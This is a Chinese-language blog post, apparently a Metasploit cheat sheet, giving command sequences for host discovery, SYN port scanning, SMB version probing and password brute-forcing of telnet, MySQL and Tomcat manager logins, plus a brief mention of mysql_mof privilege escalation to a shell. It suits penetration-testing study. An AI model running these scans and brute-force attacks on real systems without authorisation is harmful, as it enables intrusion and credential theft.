美文网首页
metasploit常用模块使用命令-信息收集

metasploit常用模块使用命令-信息收集

作者: ApacheShiro | 来源:发表于2019-01-21 11:17 被阅读0次

    使用arp_sweep模块来发现存活的主机

    search arp_sweep                               //查询此模块下的攻击模块

    use   查询出来的攻击模块                   //加载攻击模块

    show options                                       //查看一下该模块需要配置的选项参数

    set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

    exploit                                                 //进行攻击

    使用Metasploit的SYN端口扫描器对单个主机进行一次简单的扫描

    use auxiliary/scanner/portscan/syn     //加载SYN端口扫描器

    show options                                       //查看一下该模块需要配置的选项参数

    set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

    exploit                                                 //进行攻击

    使用smb_version模块对目标主机的系统版本进行探测

    search smb_version                            //查询此模块下的攻击模块

    use   查询出来的攻击模块                   //加载攻击模块

    show options                                       //查看一下该模块需要配置的选项参数

    set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

    exploit                                                 //进行攻击

    使用telnet_login模块对目标主机的telnet服务进行系统密码爆破

    使用nmap扫描出开放的23端口,即可使用telnet模块进行爆破

    search telnet_login                             //查询此模块下的攻击模块

    use   查询出来的攻击模块                  //加载攻击模块

    show options                                       //查看一下该模块需要配置的选项参数

    set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

    set PASS_FILE pass                          //使用set命令将PASS_FILE设置为使用文件名字为pass的密码本进行爆破

    set USERNAME root                          //使用set命令将USERNAME设置用户名为root

    使用mysql_login模块对目标主机的MySQL数据库进行爆破

    search mysql_login                             //查询此模块下的攻击模块

    use   查询出来的攻击模块                   //加载攻击模块

    show options                                       //查看一下该模块需要配置的选项参数

    set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

    set PASS_FILE pass                          //使用set命令将PASS_FILE设置为使用文件名字为pass的密码本进行爆破

    set USERNAME root                          //使用set命令将USERNAME设置用户名为root

    查出密码后然后用mysql_enum查看数据库信息

    mysql_mof模块进行提权 ,获得shell,低于mysql5.6版本

    使用tomcat_mgr_login模块对目标主机的8180端口,也就是tomcat中间件进行登陆爆破

    search tomcat_mgr_login                    //查询此模块下的攻击模块

    use   查询出来的攻击模块                   //加载攻击模块

    show options                                       //查看一下该模块需要配置的选项参数

    set RHOSTS 192.168.20.20               //使用set命令将RHOSTS设置为目标电脑的IP

    set USERNAME tomcat                      //使用set命令将USERNAME设置用户名为root           USER_FILE

    set PASSWORD tomcat                      //使用set命令将PASSWORD设置用户名为root           PASS_FILE

    相关文章

      网友评论

          本文标题:metasploit常用模块使用命令-信息收集

          本文链接:https://www.haomeiwen.com/subject/gtjhrqtx.html